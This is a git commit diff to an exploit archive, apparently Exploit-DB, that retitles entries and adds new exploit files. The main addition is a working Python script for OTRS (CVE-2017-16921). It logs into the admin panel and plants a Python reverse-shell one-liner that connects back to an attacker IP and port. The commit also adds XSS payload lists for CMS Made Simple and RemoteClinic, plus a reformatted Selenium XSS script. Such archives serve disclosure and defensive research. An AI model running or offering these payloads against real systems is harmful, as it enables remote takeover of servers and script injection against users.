DB: 2021-04-23

6 changes to exploits/shellcodes OpenSMTPD 6.6.2 - Remote Code Execution OpenSMTPD 6.6.1 - Remote Code Execution OTRS 5.0.x/6.0.x - Remote Command Execution OTRS 5.0.x/6.0.x - Remote Command Execution (1) RemoteClinic 2.0 - 'Multiple' Stored Cross-Site Scripting (XSS) CMS Made Simple 2.2.15 - 'title' Cross-Site Scripting (XSS) OTRS 6.0.1 - Remote Command Execution (2)
2021-04-23 05:01:59 +00:00 · 2021-04-23 05:01:59 +00:00 · acb55122f4
commit acb55122f4
parent 7fa85628bd
7 changed files with 206 additions and 20 deletions
--- a/exploits/linux/remote/47984.py
+++ b/exploits/linux/remote/47984.py
@ -1,4 +1,4 @@
-# Exploit Title: OpenSMTPD 6.6.2 - Remote Code Execution
+# Exploit Title: OpenSMTPD 6.6.1 - Remote Code Execution
 # Date: 2020-01-29
 # Exploit Author: 1F98D
 # Original Author: Qualys Security Advisory
--- a/exploits/perl/webapps/43853.txt
+++ b/exploits/perl/webapps/43853.txt
@ -1,4 +1,4 @@
-# Exploit Title: OTRS Shell Access 
+# Exploit Title: OTRS 5.0.x/6.0.x - Remote Command Execution (1) 
 # Date: 21-01-2018
 # Exploit Author: Bæln0rn
 # Vendor Homepage: https://www.otrs.com/
--- a/exploits/perl/webapps/49794.py
+++ b/exploits/perl/webapps/49794.py
@ -0,0 +1,118 @@
+# Exploit Title: OTRS 6.0.1 - Remote Command Execution (2)
+# Date: 21-04-2021
+# Exploit Author: Hex_26
+# Vendor Homepage: https://www.otrs.com/
+# Software Link: http://ftp.otrs.org/pub/otrs/
+# Version: 4.0.1 - 4.0.26, 5.0.0 - 5.0.24, 6.0.0 - 6.0.1
+# Tested on: OTRS 5.0.2/CentOS 7.2.1511
+# CVE : CVE-2017-16921
+
+#!/usr/bin/env python3
+"""
+Designed after https://www.exploit-db.com/exploits/43853.
+Runs a python reverse shell on the target with the preconfigured options.
+
+This script does not start a listener for you. Run one on your own with netcat or another similar tool
+
+By default, this script will launch a python reverse shell one liner with no cleanup. Manual cleanup needs to be done for the PGP options in the admin panel if you wish to preserve full working condition.
+"""
+
+import requests;
+import sys;
+
+baseuri = "http://10.1.1.1/index.pl";
+username = "root@localhost";
+password = "root";
+revShellIp = "10.1.1.2";
+revShellPort = 7007;
+
+sess = requests.Session();
+
+print("[+] Retrieving auth token...");
+
+data = {"Action":"Login","RequestedURL":"","Lang":"en","TimeOffset":"-480","User":username,"Password":password};
+
+sess.post(baseuri,data=data);
+
+if "OTRSAgentInterface" in sess.cookies.get_dict():
+    print("[+] Successfully logged in:");
+    print("OTRSAgentInterface",":",sess.cookies.get_dict()["OTRSAgentInterface"]);
+else:
+    print("[-] Failed to log in. Bad credentials?");
+    sys.exit();
+
+print("[+] Grabbing challenge token from PGP panel...");
+
+contents = sess.get(baseuri+"?Action=AdminSysConfig;Subaction=Edit;SysConfigSubGroup=Crypt::PGP;SysConfigGroup=Framework").text;
+challTokenStart = contents.find('<input type="hidden" name="ChallengeToken" value="')+50;
+challengeToken = contents[challTokenStart:challTokenStart+32];
+print("[+]",challengeToken);
+
+
+print("[+] Enabling PGP keys in config, and setting our malicious command");
+
+settings = {\
+"ChallengeToken":challengeToken,\
+"Action":"AdminSysConfig",\
+"Subaction":"Update",\
+"SysConfigGroup":"Framework",\
+"SysConfigSubGroup":"Crypt::PGP",\
+"DontWriteDefault":"1",\
+"PGP":"1",\
+"PGP::Bin":"/usr/bin/python",\
+"PGP::Options":"-c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"" + revShellIp + "\"," + str(revShellPort) + "));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'",\
+"PGP::Key::PasswordKey[]":"488A0B8F",\
+"PGP::Key::PasswordContent[]":"SomePassword",\
+"PGP::Key::PasswordDeleteNumber[]":"1",\
+"PGP::Key::PasswordKey[]":"D2DF79FA",\
+"PGP::Key::PasswordContent[]":"SomePassword",\
+"PGP::Key::PasswordDeleteNumber[]":"2",\
+"PGP::TrustedNetworkItemActive":"1",\
+"PGP::TrustedNetwork":"0",\
+"PGP::LogKey[]":"BADSIG",\
+"PGP::LogContent[]":"The+PGP+signature+with+the+keyid+has+not+been+verified+successfully.",\
+"PGP::LogDeleteNumber[]":"1",\
+"PGP::LogKey[]":"ERRSIG",\
+"PGP::LogContent[]":"It+was+not+possible+to+check+the+PGP+signature%2C+this+may+be+caused+by+a+missing+public+key+or+an+unsupported+algorithm.",\
+"PGP::LogDeleteNumber[]":"2",\
+"PGP::LogKey[]":"EXPKEYSIG",\
+"PGP::LogContent[]":"The+PGP+signature+was+made+by+an+expired+key.",\
+"PGP::LogDeleteNumber[]":"3",\
+"PGP::LogKey[]":"GOODSIG",\
+"PGP::LogContent[]":"Good+PGP+signature.",\
+"PGP::LogDeleteNumber[]":"4",\
+"PGP::LogKey[]":"KEYREVOKED",\
+"PGP::LogContent[]":"The+PGP+signature+was+made+by+a+revoked+key%2C+this+could+mean+that+the+signature+is+forged.",\
+"PGP::LogDeleteNumber[]":"5",\
+"PGP::LogKey[]":"NODATA",\
+"PGP::LogContent[]":"No+valid+OpenPGP+data+found.",\
+"PGP::LogDeleteNumber[]":"6",\
+"PGP::LogKey[]":"NO_PUBKEY",\
+"PGP::LogContent[]":"No+public+key+found.",\
+"PGP::LogDeleteNumber[]":"7",\
+"PGP::LogKey[]":"REVKEYSIG",\
+"PGP::LogContent[]":"The+PGP+signature+was+made+by+a+revoked+key%2C+this+could+mean+that+the+signature+is+forged.",\
+"PGP::LogDeleteNumber[]":"8",\
+"PGP::LogKey[]":"SIGEXPIRED",\
+"PGP::LogContent[]":"The+PGP+signature+is+expired.",\
+"PGP::LogDeleteNumber[]":"9",\
+"PGP::LogKey[]":"SIG_ID",\
+"PGP::LogContent[]":"Signature+data.",\
+"PGP::LogDeleteNumber[]":"10",\
+"PGP::LogKey[]":"TRUST_UNDEFINED",\
+"PGP::LogContent[]":"This+key+is+not+certified+with+a+trusted+signature%21.",\
+"PGP::LogDeleteNumber[]":"11",\
+"PGP::LogKey[]":"VALIDSIG",\
+"PGP::LogContent[]":"The+PGP+signature+with+the+keyid+is+good.",\
+"PGP::LogDeleteNumber[]":"12",\
+"PGP::StoreDecryptedData":"1"\
+};
+
+
+sess.post(baseuri+"?Action=AdminSysConfig;Subaction=Edit;SysConfigSubGroup=Crypt::PGP;SysConfigGroup=Framework",data=settings);
+
+print("[+] Now attempting to trigger the command. If this hangs, it likely means the reverse shell started.");
+
+sess.get(baseuri+"?Action=AdminPGP");
+
+print("[+] Exploit complete, check your listener for a shell");
--- a/exploits/php/webapps/49781.py
+++ b/exploits/php/webapps/49781.py
@ -61,22 +61,14 @@ element_for_natrutvanie="submit"
 browser.get(("http://localhost/RemoteClinic/staff/register.php"))

 ### Inner text...
-browser.execute_script("document.querySelector('[name=\"first_name\"]').value
-= '<img src=1 onerror=alert(`Please_fix_it`)>'")
-browser.execute_script("document.querySelector('[name=\"last_name\"]').value
-= '<img src=1 onerror=alert(`Please_fix_it`)>'")
-browser.execute_script("document.querySelector('[name=\"userid\"]').value =
-'nu11secur1ty@gmail.com'")
-browser.execute_script("document.querySelector('[name=\"passkey\"]').value
-= 'password'")
-browser.execute_script("document.querySelector('[name=\"contact\"]').value
-= '123456789'")
-browser.execute_script("document.querySelector('[name=\"mobile\"]').value =
-'12345678910'")
-browser.execute_script("document.querySelector('[name=\"skype\"]').value =
-'nu11secur1ty'")
-browser.execute_script("document.querySelector('[name=\"address\"]').value
-= 'Kurec A 31'")
+browser.execute_script("document.querySelector('[name=\"first_name\"]').value = '<img src=1 onerror=alert(`Please_fix_it`)>'")
+browser.execute_script("document.querySelector('[name=\"last_name\"]').value = '<img src=1 onerror=alert(`Please_fix_it`)>'")
+browser.execute_script("document.querySelector('[name=\"userid\"]').value = 'nu11secur1ty@gmail.com'")
+browser.execute_script("document.querySelector('[name=\"passkey\"]').value = 'password'")
+browser.execute_script("document.querySelector('[name=\"contact\"]').value = '123456789'")
+browser.execute_script("document.querySelector('[name=\"mobile\"]').value = '12345678910'")
+browser.execute_script("document.querySelector('[name=\"skype\"]').value = 'nu11secur1ty'")
+browser.execute_script("document.querySelector('[name=\"address\"]').value = 'Kurec A 31'")
 browser.find_element_by_name('image').send_keys("C:\\Users\\nu11secur1ty\\Desktop\\CVE\\CVE-2021-30044\\nu11secur1ty.png")
 time.sleep(5)

--- a/exploits/php/webapps/49793.txt
+++ b/exploits/php/webapps/49793.txt
@ -0,0 +1,22 @@
+# Exploit Title: CMS Made Simple 2.2.15 - 'title' Cross-Site Scripting (XSS)
+# Date: 2021/03/19
+# Exploit Author: bt0
+# Vendor Homepage: http://www.cmsmadesimple.org/
+# Software Link: https://s3.amazonaws.com/cmsms/downloads/14832/cmsms-2.2.15-install.zip
+# Version: 2.2.15
+# CVE: CVE-2021-28935 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28935
+
+-----------------------------------------------------------
+
+If you log into Admin panel and open My Preferences you could be able to exploit XSS in title field
+
+Reflected XSS in /admin/addbookmark.php
+
+Some payloads that works:
+
+"><script>prompt(1)</script><"
+"><script>alert(1)</script><"
+63311';alert(1)//812
+//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
+
+------------------------------------------------------------
--- a/exploits/php/webapps/49795.txt
+++ b/exploits/php/webapps/49795.txt
@ -0,0 +1,51 @@
+# Exploit Title: RemoteClinic 2.0 - 'Multiple' Stored Cross-Site Scripting (XSS)
+# Date: 13/04/2021
+# Exploit Author: Saud Ahmad
+# Vendor Homepage: https://remoteclinic.io/
+# Software Link: https://github.com/remoteclinic/RemoteClinic
+# Version: 2.0
+# Tested on: Windows 10
+# CVE : CVE-2021-30030, CVE-2021-30034, CVE-2021-30039, CVE-2021-30042
+
+#Steps to Reproduce:
+
+1)Login in Application as Doctor.
+2)Register a Patient with Full Name Field as XSS Payload: XSS"><img src=x onerror=alert(`XSS-BY-Saud-Ahmad`)>
+3)After Register Patient, go to "Patients" endpoint.
+4)XSS Executed.
+
+For Detail POC: https://github.com/remoteclinic/RemoteClinic/issues/1
+
+#Steps to Reproduce:
+
+1)Login in Application as Doctor.
+2)Register a Patient.
+3)After Register Patient, a page redirect to Register Report Page. 
+4)Here is "Symptoms" Field as XSS Payload: XSS"><img src=x onerror=alert(`XSS-BY-Saud-Ahmad`)>
+4)After Register Report, Click on home which is "dashboard" endpoint.
+5)XSS Executed.
+
+For Detail POC: https://github.com/remoteclinic/RemoteClinic/issues/5
+
+#Steps to Reproduce:
+
+1)Login in Application as Doctor.
+2)Register a Patient.
+3)After Register Patient, a page redirect to Register Report Page. 
+4)When you scroll down page two fields there "Fever" and "Blood Pressure", both are vulnerable to XSS, inject XSS Payload in both Fields: XSS"><img src=x onerror=alert(`XSS-BY-Saud-Ahmad`)>
+4)After Register Report, Click on home.
+5)Now Click on Report, XSS Executed.
+
+For Detail POC: https://github.com/remoteclinic/RemoteClinic/issues/8
+
+#Steps to Reproduce:
+
+1)Login in Application as Doctor.
+2)Register a New Clinic.
+3)Here is four fields "Clinic Name", "Clinic Address", "Clinic City" and "Clinic Contact". All are vulnerable to XSS. 
+4)Inject XSS Payload in all Fields: XSS"><img src=x onerror=alert(`XSS-BY-Saud-Ahmad`)>
+4)Now go to Clinic Directory.
+5)Click on that Clinic.
+6)XSS Executed.
+
+For Detail POC: https://github.com/remoteclinic/RemoteClinic/issues/11
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -18351,7 +18351,7 @@ id,file,description,date,author,type,platform,port
 47924,exploits/linux/remote/47924.rb,"Barco WePresent - file_transfer.cgi Command Injection (Metasploit)",2020-01-15,Metasploit,remote,linux,
 47936,exploits/hardware/remote/47936.js,"Sagemcom F@ST 3890 (50_10_19-T1) Cable Modem - 'Cable Haunt' Remote Code Execution",2020-01-15,Lyrebirds,remote,hardware,
 47956,exploits/linux/remote/47956.py,"Pachev FTP Server 1.0 - Path Traversal",2020-01-23,1F98D,remote,linux,21
-47984,exploits/linux/remote/47984.py,"OpenSMTPD 6.6.2 - Remote Code Execution",2020-01-30,1F98D,remote,linux,
+47984,exploits/linux/remote/47984.py,"OpenSMTPD 6.6.1 - Remote Code Execution",2020-01-30,1F98D,remote,linux,
 48004,exploits/hardware/remote/48004.c,"HiSilicon DVR/NVR hi3520d firmware - Remote Backdoor Account",2020-02-05,Snawoot,remote,hardware,
 48037,exploits/linux_mips/remote/48037.rb,"D-Link Devices - Unauthenticated Remote Command Execution in ssdpcgi (Metasploit)",2020-02-10,Metasploit,remote,linux_mips,1900
 48038,exploits/linux/remote/48038.rb,"OpenSMTPD - MAIL FROM Remote Code Execution (Metasploit)",2020-02-10,Metasploit,remote,linux,25
@ -39562,7 +39562,7 @@ id,file,description,date,author,type,platform,port
 43848,exploits/java/webapps/43848.txt,"Oracle JDeveloper 11.1.x/12.x - Directory Traversal",2018-01-21,hyp3rlinx,webapps,java,
 43849,exploits/json/webapps/43849.txt,"Shopware 5.2.5/5.3 - Cross-Site Scripting",2018-01-21,Vulnerability-Lab,webapps,json,
 43850,exploits/php/webapps/43850.txt,"CentOS Web Panel 0.9.8.12 - Multiple Vulnerabilities",2018-01-21,Vulnerability-Lab,webapps,php,
-43853,exploits/perl/webapps/43853.txt,"OTRS 5.0.x/6.0.x - Remote Command Execution",2018-01-21,Bæln0rn,webapps,perl,
+43853,exploits/perl/webapps/43853.txt,"OTRS 5.0.x/6.0.x - Remote Command Execution (1)",2018-01-21,Bæln0rn,webapps,perl,
 43855,exploits/php/webapps/43855.txt,"CentOS Web Panel 0.9.8.12 - 'row_id' / 'domain' SQL Injection",2018-01-23,Vulnerability-Lab,webapps,php,
 43858,exploits/multiple/webapps/43858.txt,"NEC Univerge SV9100/SV8100 WebPro 10.0 - Configuration Download",2018-01-23,LiquidWorm,webapps,multiple,
 43860,exploits/php/webapps/43860.txt,"LiveCRM SaaS Cloud 1.0 - SQL Injection",2018-01-23,"Ihsan Sencan",webapps,php,
@ -43957,6 +43957,7 @@ id,file,description,date,author,type,platform,port
 49779,exploits/php/webapps/49779.txt,"BlackCat CMS 1.3.6 - 'Multiple' Stored Cross-Site Scripting (XSS)",2021-04-21,"Ömer Hasan Durmuş",webapps,php,
 49780,exploits/multiple/webapps/49780.py,"Discourse 2.7.0 - Rate Limit Bypass leads to 2FA Bypass",2021-04-21,Mesh3l_911,webapps,multiple,
 49781,exploits/php/webapps/49781.py,"RemoteClinic 2 - 'Multiple' Cross-Site Scripting (XSS)",2021-04-21,nu11secur1ty,webapps,php,
+49795,exploits/php/webapps/49795.txt,"RemoteClinic 2.0 - 'Multiple' Stored Cross-Site Scripting (XSS)",2021-04-22,"Saud Ahmad",webapps,php,
 49783,exploits/php/webapps/49783.py,"rconfig 3.9.6 - Arbitrary File Upload to Remote Code Execution (Authenticated) (2)",2021-04-21,"Vishwaraj Bhattrai",webapps,php,
 49784,exploits/php/webapps/49784.py,"OpenEMR 5.0.2.1 - Remote Code Execution",2021-04-21,Hato0,webapps,php,
 49785,exploits/hardware/webapps/49785.txt,"Adtran Personal Phone Manager 10.8.1 - 'emailAddress' Stored Cross-Site Scripting (XSS)",2021-04-21,3ndG4me,webapps,hardware,
@ -43965,3 +43966,5 @@ id,file,description,date,author,type,platform,port
 49788,exploits/php/webapps/49788.rb,"GravCMS 1.10.7 - Unauthenticated Arbitrary YAML Write/Update (Metasploit)",2021-04-21,"Mehmet Ince",webapps,php,
 49790,exploits/multiple/webapps/49790.py,"Hasura GraphQL 1.3.3 - Local File Read",2021-04-21,"Dolev Farhi",webapps,multiple,
 49791,exploits/multiple/webapps/49791.py,"Hasura GraphQL 1.3.3 - Service Side Request Forgery (SSRF)",2021-04-21,"Dolev Farhi",webapps,multiple,
+49793,exploits/php/webapps/49793.txt,"CMS Made Simple 2.2.15 - 'title' Cross-Site Scripting (XSS)",2021-04-22,bt0,webapps,php,
+49794,exploits/perl/webapps/49794.py,"OTRS 6.0.1 - Remote Command Execution (2)",2021-04-22,Hex_26,webapps,perl,